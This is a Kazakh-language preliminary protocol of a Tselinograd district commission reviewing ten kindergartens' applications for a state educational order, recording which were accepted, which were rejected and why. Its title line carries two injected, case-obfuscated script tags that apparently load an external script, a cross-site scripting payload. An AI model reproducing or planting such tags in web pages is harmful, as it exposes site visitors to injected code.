Целиноград ауданының мектепке дейінгі білім беру ұйымдарында мемлекеттік білім беру тапсырысын орналастыру жөніндегі комиссия отырысының № 2 АЛДЫНАЛА ХАТТАМАСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Целиноград ауданының мектепке дейінгі білім беру ұйымдарында мемлекеттік білім беру тапсырысын орналастыру жөніндегі комиссия отырысының
№ 2 АЛДЫНАЛА ХАТТАМАСЫ
Ақмол ауылы 2022 ж. 24 тамыз
Комиссия төрағасы:
Т.Б.Каратаев – «Ақмола облысы Білім басқармасының Целиноград ауданы бойынша білім бөлімі» мемлекеттік мекемесі басшысының м. а.
Комиссия мүшелері:
Шоктыбаева Сауле Казтаевна – "Ақмола облысы Білім басқармасының Целиноград ауданы бойынша білім бөлімі" мемлекеттік мекемесінің бас бухгалтері;
Канапиянов Азамат Жеңісұлы (келісім бойынша) – "AMANAT"партиясы Целиноград аудандық филиалының атқарушы хатшысы;
Бутакова Александра Николаевна (келісім бойынша) – Целиноград аудандық маслихатының депутаты;
Утегенова Шолпан Кажаиповна (келісім бойынша) – "Қазақстанның үздіксіз білім беру қауымдастығы" ЖТ және ЗТБ Ақмола облысы бойынша филиалының директоры;
Байдильдина Жанар Еркеновна (келісім бойынша) – «Целиноград ауданының ішкі саясат бөлімі» мемлекеттік мекемесінің басшысы;
Тулешов Ерулан Сабитұлы (келісім бойынша) – Ақмола облысы Кәсіпкерлер палатасының Целиноград аудандық филиалының директоры;
Комиссия хатшысы:
Жанауова Г.С. - "Ақмола облысы Білім басқармасының Целиноград ауданы бойынша білім бөлімі" мемлекеттік мекемесінің мектепке дейінгі тәрбие жөніндегі әдіскері
Қарауға ұсынылған өтінімдер:
1.1. «Алуа» ЖШС Софиевка ауылы «Алуа» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.2. «Атос Group» ЖШС Р. Қошқарбаев ауылы«Мерген» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.3. «Универсал Кейтеринг» ЖШС Талапкер ауылы «Амеди» балабақшасы мемлекеттік білім беру тапсырысын орналастыру ;
1.4. «Золотая рыбка» балабақшасы ЖШС Оразақ ауылы мемлекеттік білім беру тапсырысын орналастыру;
1.5. «Марлен 2050» ЖШС Талапкер ауылы «Ақ құлыншақ» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.6. «Ахмедин» ЖК Ақмешіт ауылы «Ақбота» балабақшасымемлекеттік білім беру тапсырысын орналстыру;
1.7. «Бәйтерек 2022» ЖШС Қоянды ауылы «Балапан» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.8. «Айшвария» ЖШС Ынтымақ ауылы «Тәй-тәй» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.9. «Өркен А» ЖШС Қаражар ауылы «Өркен» балабақшасы мемлекеттік білім беру тапсырысын орналастыру;
1.10. «Ай балабақшасы» ЖШС Тайтөбе ауылы«Ай балабақшасы» мемлекеттік білім беру тапсырысын орналастыру ;
Конкурстық құжаттама мен қағидалардың талаптарына сәйкес келетін конкурстық өтінімдер:
- «Бәйтерек 2022» ЖШС «Балапан» балабақшасы Қоянды а.;
- «Ахмедин.К.А» ЖК «Ақбота» балабақшасы Ақмешіт а.;
Конкурстық құжаттама мен қағидалардың талаптарына сәйкес келмейтін конкурстық өтінімдер:
- «Алуа» ЖШС Қағиданың 1-параграфының 19-тармағының
2-тармақшасына сәйкес өтінім қабылданбайды: берешегінің жоқтығы туралы банктен анықтама жоқ;
- «Атос Group» ЖШС Қағиданың 1-параграфының 19-тармағының
2-тармақшасына сәйкес өтінім қабылданбайды: мектепке дейінгі ұйымның жарғысы жоқ, Ереженің 1-параграфының 19-тармағының 3-тармақшасына сәйкес мектепке дейінгі тәрбие мен оқытуды ұйымдастыру үшін пайдаланылатын жылжымайтын мүлікке (меншікті немесе жалға алынған) құқық белгілейтін құжаттардың көшірмесі жоқ;
- «Универсал Кейтеринг» ЖШС Қағиданың 1-параграфының
19-тармағының 3-тармақшасына сәйкес өтінім қабылданбайды: мектепке дейінгі тәрбие мен оқытуды ұйымдастыру үшін пайдаланылатын жылжымайтын мүлікке (меншікті немесе жалға алынған) құқық белгілейтін құжаттардың көшірмесі жоқ;
- «Золотая рыбка» балабақшасы ЖШС өтінім қабылданбайды: Қағиданың 1-параграфының 19-тармағының 2-тармақшасына сәйкес берешектің жоқ екендігі туралы банктен анықтама жоқ;
- «Marlen 2050» ЖШС Қағиданың 1-параграфының 19-тармағының
3-тармақшасына сәйкес өтінім қабылданбайды: мектепке дейінгі тәрбие мен оқытуды ұйымдастыру үшін пайдаланылатын жылжымайтын мүлікке (меншікті немесе жалға алынған) құқық белгілейтін құжаттардың көшірмесі жоқ;
- "Айшвария" ЖШС Қағиданың 1-параграфының 19-тармағының
3 тармақшасына сәйкес өтінім қабылданбайды: мектепке дейінгі тәрбие
мен оқытуды ұйымдастыру үшін пайдаланылатын жылжымайтын
мүлікке (меншікті немесе жалға алынған) құқық белгілейтін
құжаттардың көшірмесі жоқ, Қағиданың 1-параграфының 19
тармағының 2-тармақшасына сәйкес банктен берешегінің жоқтығы
туралы анықтама, салық төлеушіден анықтама жоқ, органның
құжаттарды тапсырғанға дейін бір ай мерзімнен ерте емес мерзімі бар
берешегінің жоқтығы туралы Қағиданың 1-параграфының 19-
тармағының 4 -тармақшасына сәйкес санитариялық-эпидемиологиялық
қорытындының көшірмесі жоқ;
- "Өркен А" ЖШС Қағиданың 1-параграфының 19-тармағының
1-тармақшасына сәйкес өтінім қабылданбайды осы Қағиданың 1
қосымшасынасәйкес нысан бойынша комиссия өкілінің атына өтініш
жоқ, Қағиданың 1-параграфының 19-тармағының 3-тармақшасына
сәйкес мектепке дейінгі тәрбие және оқыту ұйымы үшін
пайдаланылатын жылжымайтын мүлікке (меншікті немесе жалға
алынған) құқық белгілейтін құжаттардың көшірмесі жоқ;
- "Ай балабақшасы" ЖШС Қағиданың 1-параграфының 19-
тармағының 2-тармақшасына сәйкес өтінім қабылданбайды банктен
берешектің жоқ екендігі туралы анықтама;
Конкурстық құжаттама талаптарына сәйкес құжаттар 2022 жылғы
05 қыркүйек 12 сағат 00 минутқа дейінгі мерзімде тапсырылсын.